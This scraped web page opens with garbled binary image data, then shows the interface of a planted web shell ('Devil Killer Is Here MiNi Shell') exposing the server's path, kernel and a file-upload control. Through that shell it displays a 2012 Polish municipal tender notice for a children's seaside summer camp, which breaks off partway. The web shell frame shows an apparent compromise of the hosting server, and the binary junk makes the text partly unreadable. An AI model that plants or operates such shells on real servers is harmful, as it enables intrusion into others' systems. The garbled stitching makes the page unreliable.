JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120405/78763-N-2012.html

<p class="kh_header"><b>Dzierżoniów: Organizacja w ramach Klubów Omnibusa - dla 100 (stu) dzieci i młodzieży od 8 do 16 lat, w  przedziale czasowym od 30.06.2012 r. do 21.07.2012 r. w miejscowościach nadmorskich (w rejonie od miejscowości Kołobrzeg do miejscowości Łeba)14-dniowych letnich kolonii  z zakresu rozwoju kompetencji kluczowych dla potrzeb realizacji projektu pn.KAŻDY MOŻE ZOSTAĆ OMNIBUSEM realizowanego w ramach POKL Priorytet III Wysoka jakość systemu oświaty, Działanie 3.3 Poprawa jakości kształcenia, Poddziałanie 3.3.4 Modernizacja treści i metod kształcenia - projekty konkursowe współfinansowanego ze śro</b><br>
<b>Numer ogłoszenia: 78763 - 2012; data zamieszczenia: 05.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dzierżoniów , Rynek 1, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 74 6450800, faks 74 6450801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzierzoniow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie przewiduje się ustanowienia dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja w ramach Klubów Omnibusa - dla 100 (stu) dzieci i młodzieży od 8 do 16 lat, w  przedziale czasowym od 30.06.2012 r. do 21.07.2012 r. w miejscowościach nadmorskich (w rejonie od miejscowości Kołobrzeg do miejscowości Łeba)14-dniowych letnich kolonii  z zakresu rozwoju kompetencji kluczowych dla potrzeb realizacji projektu pn.KAŻDY MOŻE ZOSTAĆ OMNIBUSEM realizowanego w ramach POKL Priorytet III Wysoka jakość systemu oświaty, Działanie 3.3 Poprawa jakości kształcenia, Poddziałanie 3.3.4 Modernizacja treści i metod kształcenia - projekty konkursowe współfinansowanego ze śro.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1Przedmiotem zamówienia jest organizacja kolonii letnich (zwanych dalej koloniami) na terenie Polski nad Morzem Bałtyckim w miejscowości z bezpośrednim dostępem do morza w rejonie od miejscowości Kołobrzeg do miejscowości Łeba, dla około 100 dzieci i młodzieży - w wieku od 8 do 16 lat z terenu Dzierżoniowa, Kluczborka, Serocka ( zwanych dalej uczestnikami kolonii). 
1Szacunkowa ilość uczestników kolonii wynosi: 100 dzieci i młodzieży. Zamawiający zastrzega możliwość zwiększenia lub zmniejszenia liczby uczestników kolonii w przypadku uzasadnionej rezygnacji dziecka z uczestnictwa i braku możliwości zastąpienia go innym uczestnikiem.
2Zamawiający utworzy około 7 grup uczestników kolonii z podziałem na płeć i wiek. 
3Zamawiający wymaga, aby Wykonawca dopełnił czynności, o których mowa 
w paragrafie   6.1. Rozporządzenia Ministra Edukacji Narodowej z dnia 21 stycznia 1997r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci
 i młodzieży szkolnej,a także zasad jego organizowania i nadzorowania zgodnie, 
z którym Organizator wypoczynku może zorganizować wypoczynek po przedstawieniu kuratorowi Oświaty, właściwemu ze względu na miejsce siedziby lub zamieszkania organizatora, zgłoszenia wypoczynku. Dokumenty potwierdzające dokonanie zgłoszenia należy dostarczyć Zamawiającemu  w wersji elektronicznej i papierowej w terminie co najmniej 30 przed planowanym rozpoczęciem kolonii.
4 W ramach usługi należy zapewnić noclegi (14 noclegów) dla podanej liczby uczestników oraz zapewnić rezerwację pokoi (wraz zakwaterowaniem) dla 6 opiekunów, 1 opiekuna (informatyk), 1 kierownika kolonii, native spiker s - 2 osoby oraz przedstawiciela Zamawiającego kontrolującego jakość wykonywanej usługi z uwzględnieniem podziału na płeć.
5 Zapewnienie terenu sportowo - rekreacyjnego wokół budynku ośrodka wypoczynkowego (obiekt musi być ogrodzony z całodobowym dozorem oraz zagospodarowanym z możliwością organizacji zajęć na świeżym powietrzu np.: boisko do gier zespołowych, miejsce na ognisko, grilla, sala dyskotekowa, sala telewizyjna. Ośrodek nie powinien znajdować się dalej niż 700 metrów od bezpiecznego zejścia na plażę.
2 Ilość i czas trwania turnusu.
1 Kolonia odbędzie się w jednym 14-dniowym turnusie w przedziale czasowym od 30.06.2012r. do 21.07.2012r. 
2 Czas trwania turnusu powinien liczyć 14 pełnych dni pobytu wraz z noclegiem (bez dnia przyjazdu). 
3 W ramach usługi należy zapewnić noclegi (14 noclegów) dla podanej liczby uczestników kolonii oraz zapewnić rezerwację pokoi (wraz zakwaterowaniem) dla 6 opiekunów, 
1 opiekuna (informatyk), 1 kierownika kolonii, native spiker s - 2 osoby oraz przedstawiciela Zamawiającego kontrolującego jakość wykonywanej usługi  
z uwzględnieniem podziału na płeć. 
3)Wymagania dotyczące zakwaterowania.
1 Ośrodek kolonijny oddalony od głównych dróg,
2 Ośrodek kolonijny musi zostać zatwierdzony przez Kuratorium Oświaty - zgodnie 
z przepisami MEN. Zamawiający wymaga, aby na 30 dni przed przybyciem do ośrodka uczestników kolonii wykonawca przedstawił zaświadczenie wydane przez kuratora oświaty właściwego dla miejsca zlokalizowania ośrodka  o jego zarejestrowaniu,
3 Ośrodek położony nie więcej niż 700 m od bezpiecznego wejścia na plażę, do bramy wejściowej na teren ośrodka,
4 Zakwaterowanie w budynku murowanym posiadającym aktualną kartę kwalifikacyjną obiektu zatwierdzoną przez właściwe terytorialnie Kuratorium Oświaty, 
5 Zamawiający wymaga by uczestnicy kolonii zostali  zakwaterowani w  pokojach nie więcej niż 4 osobowych z uwzględnieniem podziału na wiek i  płeć,
6 W pokojach wymagane są łazienki. W łazienkach (znajdujących się w pokojach) Zamawiający wymaga by było: WC, umywalka i natrysk z dostępem do ciepłej bieżącej wody - dostęp do ciepłej bieżącej wody przez 24 godziny na dobę),
7 Nie dopuszcza się używania łóżek piętrowych tzw. dostawek jak również zakwaterowania dzieci w namiotach i domkach campingowych,
8 Pokoje i łazienki muszą być czyste i estetyczne, pokoje muszą posiadać standardowe wyposażenie (co najmniej szafka nocna przy każdym łóżku, szafa, stół, krzesła  lub pufy w ilości odpowiadającej ilości uczestników kolonii w pokoju (minimum 4 krzesła/pufy), czystą pościel i bieliznę pościelową, koce itp.).
9 Zamawiający wymaga by na terenie ośrodka znajdowało się:
a pomieszczenie do prania oraz suszenia odzieży wraz ze  sprzętem do prasowania,
b stołówka.
10 Wykonawca zapewni możliwość dogrzania budynku w chłodne dni i noce. Dogrzewanie nastąpi po zgłoszeniu takiej konieczności przez kierownika kolonii.
11 Zamawiający wymaga by teren ośrodka był  ogrodzony, oświetlony oraz stałe strzeżony.
12 Wykonawca zapewni:
a bezpłatną bazę świetlicową (ze sprawnym sprzętem audio-wizualnym), przystosowaną do prowadzenia zajęć rekreacyjnych, wyposażoną w sprawne urządzenia rekreacyjno-sportowe (stół do tenisa stołowego, stół bilardowy, gry planszowe i zręcznościowe),
b stołówkę w budynku ośrodka kolonijnego (lub w odległości nie większej niż 500 m od ośrodka), w której mieści się odpowiednia liczba stołów i krzeseł
 z możliwością dowolnej aranżacji, 
c salę z co najmniej 5 stanowiskami komputerowymi (komputery stacjonarne lub laptopy) w pełni wyposażonymi, w pełni sprawnymi z system operacyjnym Microsoft Windows 7 wraz z  pakietem biurowym i programem antywirusowym) z dostępem do Internetu (minimum 512 MB s), oraz co najmniej 2 kolorowymi drukarkami z możliwością drukowania zdjęć/dokumentów (tonery /tusze dostarcza wykonawca). Sala powinna być wyposażona w odpowiednią ilość krzeseł i biurek. Przewidywany czas dostępu do sali to 120 godzin. Sala musi spełniać wymogi: bezpieczeństwa i akustyczne, posiadać odpowiednie oświetlenie, w tym dostęp do toalet). 
D pomieszczenie, w którym uczestnicy (grupa około 15 osób) będzie pracowała przez cały czas trwania kolonii nad multimedialnym przewodnikiem. Pomieszczenie to musi być zamykane na klucz i udostępnianie tylko dla Zamawiającego. Pomieszczenie musi być wyposażone w stół krzesła i energię elektryczną,
e dostęp do boisk (piłka nożna, siatkówka, koszykówka) na terenie ośrodka,
w którym zakwaterowani będą uczestnicy kolonii,
f teren sportowo - rekreacyjny wokół budynku ośrodka kolonijnego (obiekt musi być ogrodzony z całodobowym dozorem oraz zagospodarowanym z możliwością organizacji zajęć na świeżym powietrzu np.: boisko do gier zespołowych, miejsce na ognisko, grilla,
g piłki do grania-piłka nożna, koszykówka, siatkówka.  
13 Ze względów organizacyjnych wszyscy uczestnicy kolonii winny być zakwaterowani
 w jednej miejscowości i w jednym obiekcie tj. ośrodku kolonijnym mogącym składać się z kilku budynków, przy czym należy pamiętać, iż każdy z budynków musi spełniać wymogi określone w  niniejszej SIWZ.
14 Wykonawca pozwoli Zamawiającemu oznakować ośrodek plakatem informującym 
o realizacji projektu, zgodnie z wytycznymi Instytucji Pośredniczącej.
5. Wymagania dotyczące wyżywienia.
1 Należy zapewnić wyżywienie dla wszystkich uczestników kolonii oraz dla 6 opiekunów, 1 opiekuna (informatyk), 1 kierownika kolonii, native spiker s - 2 osoby oraz przedstawiciela Zamawiającego kontrolującego jakość wykonywanej usługi.
2 Wyżywienie składające się z minimum 4 posiłków dziennie (zgodnie 
z obowiązującymi normami żywienia Instytutu żywności i żywienia i z zasadami higieny,) wraz z napojami (tj. śniadanie, obiad-dwudaniowy, podwieczorek, kolacja wraz z nakryciami stołowymi). Na śniadanie oprócz podstawowych produktów podawanych na śniadanie, ponadto będą płatki, mleko i herbata w dzbankach. 
3 Śniadanie  i kolacja powinno zawierać ciepły element  typu np. grzanki, naleśniki itp.
4 Posiłki muszą być urozmaicone, nie dopuszcza się możliwości powtarzania tych samych dań w ciągu tygodnia. 
5 Przynajmniej raz dziennie powinny być owoce.
6 Zupa powinna być podawana w wazach. 
7 Zamawiający dopuszcza podawanie posiłków w formie szwedzkiego stołu.
8 Uczestnicy muszą mieć stały dostęp do napojów na terenie ośrodka (woda niegazowana, kompoty różne).
9 W dniu wyjazdu oraz w czasie wycieczek: suchy prowiant i napoje, pierwszy posiłek 
w dniu przyjazdu obiadokolacja, ostatni posiłek w dniu wyjazdu - śniadanie.
10 Wykonawca zapewni możliwość zabrania uczestnikom kolonii bułki lub kanapki po śniadaniu lub kolacji.   
6. Ponadto wykonawca zapewni.
1 Całodobową opiekę medyczną (lekarz na każde wezwanie, pielęgniarka 
z całodobowym pobytem w ośrodku kolonijnym, w którym zakwaterowani będą uczestnicy kolonii. Wykonawca uwzględni w cenie ofertowej koszt dojazdu lekarza na każde wezwanie ) dla całej grupy.
2 Ośrodek kolonijny, w którym będzie zorganizowany wypoczynek, musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno sanitarnych oraz ochrony Środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie Środowiska.
3 Możliwość korzystania z kąpieliska spełniającego wymogi bezpieczeństwa 
i czystości wody oraz opiekę ratowników podczas kąpieli. Wykonawca zobowiązany jest do zapewnienia warunków bezpieczeństwa uczestników kolonii, a w szczególności podczas kąpieli.
4  Program kolonii (opracowuje Wykonawca w uzgodnieniu z Zamawiającym ) powinien obejmować 2 wycieczki autokarowe, 1 półdniową wycieczkę, np. do miasteczka Western City, zajęcia na wolnym powietrzu (pobyt nad morzem- kąpiele w morzu, zabawy na plaży itp.), zabawy rekreacyjno-sportowe (zabawy kolonijne, dyskoteka) oraz obowiązki przewidziane w § 1 ust. 7  umowy, 
5)Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników kolonii osobom trzecim. Wykonawca zapewni ubezpieczenie od następstw nieszczęśliwych wypadków  każdego uczestnika kolonii (zarówno dla uczestników kolonii jak i dla 6 opiekunów,1 opiekuna (informatyk), 
1 kierownika kolonii, native spiker s - 2 osoby oraz przedstawiciela Zamawiającego kontrolującego jakość wykonywanej usługi na kwotę co najmniej 10 000,00 zł na czas podroży i pobytu na koloni. Wykonawca przedłoży Zamawiającemu na 14 dni przed dniem rozpoczęcia kolonii potwierdzenie zawarcia umowy ubezpieczenia wraz ze wskazaniem sposobu ubiegania się o wypłatę środków.
6 Opiekę ratownika w czasie kąpieli pozostającego do dyspozycji grupy przez cały czas trwania turnusu.
7 Zamawiający informuje, że przed podpisaniem umowy Zamawiający zastrzega sobie prawo kontroli zgodności oferowanego obiektu (miejsca wykonywania usługi) 
i porównania jego zgodności z opisem przedmiotu zamówienia i ze złożoną ofertą. 
W tym celu przedstawiciele Zamawiającego max. 3 osoby dokonają wizji obiektu. Wykonawca zobowiązany jest uwzględnić w swojej cenie koszty zakwaterowania 
i wyżywienia tych osób.  Termin przyjazdu zostanie uzgodniony z Zmawiającym, czas  trwania wizyty to 2 noclegi.
8 Wykonawca zapewni  dla uczestników kolonii:
a nagrody rzeczowe tj. kubki pamiątkowe z napisem miejscowości, w której będzie odbywać się kolonia - 100 szt.
b maskotki różne - 50 szt. o wysokości co najmniej 15 cm np. pajacyk pacanów, plecaczki maskotki, wiewiórki, 
c pamiątki znad morza z napisem miejscowości, w której odbywa się kolonia - 50 sztuk  (np. muszle, breloczki, statki),
d)dyplomy za udział w różnych konkursach i zabawach kolonijnych 
(zgodnie z załączonymi do SIWZ wzorami załączniki nr 6 SIWZ - 100 szt.) oraz papier kolorowy na dyplomy formatu A4 o gramaturze 170 g/m2typu np. przedszkolak- 50 kartek.
9  Koordynatora, który będzie z ramienia Wykonawcy odpowiadał za jakość świadczonych usług objętych niniejszym zamówieniem. Koordynator zobowiązany będzie do ścisłej współpracy z Kierownikiem Kolonii. Koszt zakwaterowania
 i wyżywienia Koordynatora ponosi Wykonawca.
7.Turystyka i rekreacja
1Należy zorganizować 2 całodniowe wycieczki autokarowe turystyczno-krajoznawcze, 
z zapewnieniem jednego gorącego posiłku oraz suchego prowiantu i napoi (jak w pkt. III.4 SIWZ ),  tym  co najmniej rejs statkiem i wejście na latarnie morską. Ponadto Wykonawca zorganizuje półdniową wycieczkę np. do miasteczka Western City 
z wykupieniem programu. Przed zawarciem umowy Wykonawca przedłoży cztery propozycje wycieczek do wyboru przez Zamawiającego. Program wycieczek musi być przed zawarciem umowy uzgodniony i zaakceptowany przez Zamawiającego. Wykonawca zapewni obsługę licencjonowanego przewodnika ( co najmniej jeden przewodnik na 1 autokar) na wycieczkach oraz bezpłatny wstęp dzieci i młodzieży do zwiedzanych w czasie wycieczek obiektów i miejsc. Wykonawca 
w ramach zorganizowanego wejścia na latarnie morską i rejsu statkiem zapewni każdemu uczestnikowi kolonii dyplom pamiątkowy z okazji wejścia na latarnię morską oraz z rejsu statkiem.  
2Wykonawca zapewni uczestnikom kolonii codzienne imprezy rekreacyjno-sportowe, imprezy kulturalno-oświatowe, dyskoteki, co najmniej dwa ogniska, w tym pieczenie kiełbasek, wycieczki piesze, rowerowe po okolicy, nagrody rzeczowe oraz dyplomy dla uczestników kolonii letnich za udział w konkursach i zabawach (zgodnie z załączonym do SIWZ wzorem załącznik nr 6 do SIWZ).
3 Wykonawca zapewni bilety wstępu dla wszystkich uczestników kolonii oraz dla 
6 opiekunów,1 opiekuna (informatyk), 1 kierownika kolonii, native spiker s - 2 osoby, przedstawiciela Zamawiającego kontrolującego jakość wykonywanej usługi oraz przewodników. 
8. Transport uczestników  kolonii na i z wycieczek. 
1 Transport uczestników kolonii w ciągu dnia, autokarami sprawnymi technicznie
 (z aktualnym przeglądem technicznym) wyposażonym w działającą klimatyzację, pasy bezpieczeństwa wraz z odpowiednią ilością opiekunów (autokary mają być podstawione minimum 30 minut przed wyjazdem).
2  Uwaga!!!! Przedmiotem niniejszego zamówienia nie jest transport uczestników
 z i do miejsca wypoczynku. Wykonawca ma zapewnić transport w ramach organizowanych wycieczek. 
3 Wykonawca zapewni:
a ubezpieczenia autokaru oraz wymagane koncesje,
b w przypadku awarii autokaru, zapewni autokar zastępczy na własny koszt,
4 Do grupy podczas transportu nie może być dołączona inna grupa.
5 Wykonawca zezwoli na oznaczenie autokarów plakatem lub tablicą informującą
 o projekcie.  
6 Kierowcy Wykonawcy zachowają szczególną dbałość o dobro dzieci w czasie jazdy oraz przy wsiadaniu do pojazdu i wysiadaniu. Podczas przewozu kierowcy zapewnią dzieciom bezpieczny dla ich zdrowia przejazd.
7 Kierowcy Wykonawcy zobowiązani są do upewnienia się czy dziecko wysiadające bezpiecznie opuściło pojazd i oddaliło się na bezpieczną odległość od pojazdu przed każdym uruchomieniem pojazdu.
8 Kierowcy Wykonawcy wyposażeni będą w identyfikatory pozwalające zawsze i w łatwy sposób zidentyfikować ich nazwisko i imię oraz nazwę firmy.
9 Wykonawca nie jest uprawniony do przewożenia w pojeździe jakichkolwiek innych osób niż wskazane przez Zamawiającego. 
10 Wykonawca zapewni przestrzeganie w pojazdach Wykonawcy wykorzystywanych przy wykonywaniu niniejszej umowy, zakazu palenia tytoniu, spożywania alkoholu
 i jakichkolwiek środków narkotycznych.
11 W pojazdach wykorzystywanych przy wykonywaniu niniejszej usługi nie mogą być umieszczane reklamy wyrobów tytoniowych, zawierających alkohol, substancje narkotyczne lub zawierające treści uznawane za obraźliwe, gorszące lub pornograficzne.
12 Wykonawca zapewni w pojazdach wykorzystywanych przy wykonywaniu niniejszej umowy czystość i odpowiednią temperaturę.
13Wykonawca zapewni w trakcie podróży postoje w miejscu do tego przeznaczonym
 i z dostępem do toalet.
14 Wykonawca ponosi wszelkie koszty związane z wykonaniem usługi m.in.  opłatą parkingową. 
15 Wykonawca zapewni transport ( autobus/ autokar) w liczbie miejsc odpowiadającej liczbie uczestników kolonii, opiekunów, kierownika kolonii, przedstawiciela zamawiającego, native spiker s, przewodników.
W związku z tym, że przedmiot zamówienia objęty niniejszym postępowaniem jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Wykonawca zobowiązany jest do stosowania w całości prowadzonej dokumentacji w tym w dokumentach rozliczeniowych (np.: protokoły i inne) jak również w korespondencji związanej z realizacją przedmiotowej usługi- zgodnie z Instrukcją dostarczoną po podpisaniu umowy przez Zamawiającego loga Unii Europejskiej z dwoma podpisami Unia Europejska i Europejski Fundusz Społeczny, logo POKL z podpisem Kapitał Ludzki Narodowa Strategia Spójności i oraz informacji o źródle finansowania- zgodnie z obowiązującymi wytycznymi oznakowania projektów POKL loga Unii Europejskiej oraz zapis projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazanie w załączniku nr 5 do SIWZ wykonania usługi w zakresie organizacji koloni, dla co najmniej 70 dzieci lub/i młodzieży wykazanie minimum 1 usługi wykonanej w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że ta usługa została wykonane należycie. 
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
